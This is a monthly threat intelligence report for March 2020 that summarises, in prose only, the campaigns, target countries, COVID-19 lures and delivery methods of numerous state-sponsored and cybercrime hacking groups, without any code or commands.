Monthly Threat Actor Group Intelligence Report, March 2020

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from February 21, 2020 to March 20, 2020.

1. SectorA Activity Features

A total of two hacking groups, SectorA01 and SectorA05 groups were discovered among SectorA groups this March.

SectorA01 group’s hacking activity was found in Vietnam, China, Indonesia, United Kingdom, Hong Kong and United States. The SectorA01 group created variant of the malware targeting Automated Teller Machine(ATM) in this March.

SectorA05 group’s hacking activity was found in South Korea, United States and United Kingdom. They used a bait document in the form of Hangul document file(HWP) disguised as a resume. Also, bait document in the form of MS office files was found, it used theme of news, instructions, letter from the Secretary of United States related to COVID-19 and Kaesong Industrial Complex.

The purpose of the hacking activities of the SectorA hacking groups to date is to collect high-quality information about political and diplomatic activities of South Korea and to steal money from financial organization all around the world. This purpose has remained the same for a long time and is expected to continue without change for the time being.

2. SectorB Activity Features

A total of five hacking groups, SectorB01, SectorB04, SectorB08, SectorB09 and SectorB22 groups were discovered among SectorB groups this March. SectorB01 group’s hacking activity was found in Kyrgyzstan, Pakistan, China, Hong Kong, Vietnam and United States. The attackers used CVE-2017-11882 vulnerability. When executing the document, it drops malware in the form of DLL and downloads additional malware. The malware used contents of news article below: “The discussions between Kyrgyzstan’s president and the Minister of Finance for reduce budgets due to COVID-19”. SectorB04 group’s hacking activity was found in China. The attackers used malware in the form of LNK file disguised as document file. When executing LNK file, embedded Visual Basic Script(VBScript) is generate executable file. To avoid user suspicion, the malware shows a PDF file of the actual COVID-19 related report shared by the WHO with health authorities in each country. SectorB08 group’s hacking activity was found in South Korea. The attackers used malware in the form of Excel and Power Point files, disguised as an emergency contact for a specific religious group. SectorB09 group’s hacking activity was found in Taiwan. The attackers used malware in the form of ELF file targeting Linux environments. The malware connects to C2 server, and executes shell command and file upload and download. SectorB22 group’s hacking activity was found in Mongolia, Russia, Ukraine, China, Hong Kong, Belarus, United Kingdom, Vietnam, Philippines, Taiwan and South Korea. The attackers used RTF file containing the CVE-2017-11882 vulnerability, identically found in other subgroups of SectorB. When executing the file, it drops malware in the form of DLL and downloads additional malware. The document used theme of “Promoting Prevention and Management of COVID-19 Disease presented by the Prime Minister of Vietnam”. The purpose of the hacking activities of SectorB groups to date is to collect high-level information such as political and diplomatic activities of government agencies around the world.

3. SectorC Activity Features

A total of three hacking groups, SectorC01, SectorC02 and SectorC08, were discovered among SectorC groups this March.

SectorC01 group’s hacking activity was found in several countries located in Africa, Europe, Middle East, North/South America and South Asia. The group continued to perform credential phishing activity using DNS server’s Sender Policy Framework(SPF).

SectorC02 group’s hacking activity was found in Armenia, Israel, Romania, South Korea, Sweden, France and Moldova. The group used Watering Hole method, which injects JavaScript into the target web site and collected browser and OS information about specific users who revisited the site.

SectorC08 group’s hacking activity was found in Ukraine, Russia, Hong Kong, Philippines and United States. The attackers used malware in the form of MS Word file that contained macro scripts. The document has themed of “COVID-19 News”, and it disguised as being sent by the Ukrainian Ministry of Health’s Public Health Center.

The purpose of the hacking activities of the SectorC groups to date is to collect high-level information such as political and diplomatic activities in countries that are located near to the country supporting SectorC.

4. SectorD Activity Features

A total of three hacking groups, SectorD01, SectorD02 and SectorD11, were discovered among SectorD groups this March.

SectorD01 group’s hacking activity was found in Lebanon, United Kingdom and Ireland. The attackers used spear phishing email attached with malware in the form of MS Excel file. When executing the document, the malware aiming data leak is executed on the infected system through the macro script.

SectorD02 group’s hacking activity was found in Canada, China, Georgia, Armenia, South Korea, Azerbaijan, India, Iraq, Turkey, Jordan and Australia. The attackers used spear phishing email attached with malware in the form of MS Excel file that contained macro scripts. When Macro script was executes, the powershell script downloads additional payloads from the hard-coded attacker server.

SectorD11 group’s hacking activity was found in Libya, Turkey, France and Egypt. The attackers created APK file targeting Android environments using various themes. The malware disguised as COVID-19 Infection Status Check app.

SectorD groups conducted hacking activities targeting countries that are related to the political rivals of SectorD. Their purpose is to collect high-level information such as political and diplomatic activities of people or nations opposed to the SectorD government.

5. SectorE Activity Features

A total of one hacking group, SectorE01 was discovered among SectorE groups this March.

SectorE01 group’s hacking activity was found in China, Japan and Italy. The attackers used executable file disguised as document file using icon of MS Office program. The file name of the document is relation to the “The business Regulations of Central Party School of the Communist Party of China”, an institution that fosters high-level executives of the Chinese Communist Party.

Until now, the hacking activities of the SectorE groups are intended to gather high-level information including political, diplomatic and military activities involving the Pakistani government. However, recently they expanded their activity to East Asia and other regions, including China, as their activities to obtain high-level information on politics, diplomacy and technology of other countries increased.

6. SectorF Activity Features

A total of one hacking group, SectorF01 was discovered among SectorF groups this March.

SectorF01 group’s hacking activity was found in China, Ukraine and Spain. They used DLL Side Loading method, which loads malicious DLL files using WPS Office program, a text editor made in China. When executing the program, after loading the malicious DLL, it shows the normal file including the news article body related to “COVID-19” to avoid the user’s suspicion. Finally, it loads the backdoor to collect the infected system information.

The SectorF01 group aims to gather high-level information including political, diplomatic and military activities in countries nearby. They also aim to steal advanced technical information to advance their country’s economic development.

7. SectorH Activity Features

A total of one hacking group, SectorH03 was discovered among SectorH groups this March.

The SectorH03 group’s hacking activity was found in Hong Kong, Pakistan, India, Netherlands and Hungary. The attackers used spear phishing email attached with malware in the form of MS Excel file similar to the past. When executing the malicious document, built-in remote control malware is dropped, and it performs such as collecting login information stored in the browser and collecting files.

The hacking activities of the SectorH group include hacking activity for both cybercrime and government support purposes. As diplomatic friction with neighboring continues increase, activities to gather high-level military and political information from them will also continue.

8. SectorQ Activity Features

A total of one hacking group, SectorQ01 was discovered among SectorQ groups this March.

The SectorQ01 group’s hacking activity was found in China, Germany, Japan, Iraq, United Kingdom, United States, India, Ireland, Russia, France, Austria, Iran, Syria and Hungary. The group have been active since at least 2007. Among the malware found, SYS files and Mac-OS target files have also been found.

The purpose of the hacking activities of SectorQ groups to date is to collect high-level information such as political and diplomatic activities of government agencies around the world. The collection of this advanced information is intended to maximize the political and economic interests of the country.

9. Cyber Crime Activity Features

A total of four hacking groups, SectorJ03, SectorJ04, SectorJ09 and SectorJ14, were discovered among SectorJ groups this March.

The hacking activities of these groups, unlike other government-sponsored hacking groups, target valuable online information. They hacked specific companies and organizations then deploy ransomware on their internal networks or threaten them to demand monetary payments after stealing important industry secrets.

The SectorJ03 group’s hacking activity was found in Arab Emirates, Philippines, Russia, United Kingdom, China, Romania, Jordan, United States, Netherlands, France and Palestine. The attackers used spear phishing email attached with MS Office document containing macro scripts or PDF file containing link.

The SectorJ04 group’s hacking activity was found in several countries.: India, United States, Canada, Mozambique, United Kingdom, Iceland, Germany, Hong Kong, Hungary, Swiss, Romania, Ukraine, Lithuania, France, Israel, Czechia, Uruguay, Iran, Poland, Finland, Singapore, Latvia, Ireland, Italy, Greece, Netherlands and China.
The attackers used spam mail that contained malicious link or attached with malware in the form of MS Office file similar to the past. In particular, in this hacking activity, the attackers wrote the body of the spam mail as the content related to the COVID-19. When clicking the malicious link, it downloads a malicious document containing macro scripts from the attacker server.

The SectorJ09 group’s hacking activity was found in France. The attackers collect the user’s name, address, email, phone number and credit card payment information by inserting obfuscated skimming scripts on the website. This is similar to previous hacking activities.

The SectorJ14 group’s hacking activity was found in Japan. The attackers distributed malware in the form of APK(Android Application Package) file using Smishing message with the link. The malicious APK file was disguised as a courier company application. If an application related to a bank or carrier is installed in an infected device, a phishing page for information colltion is pop-uped.

The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.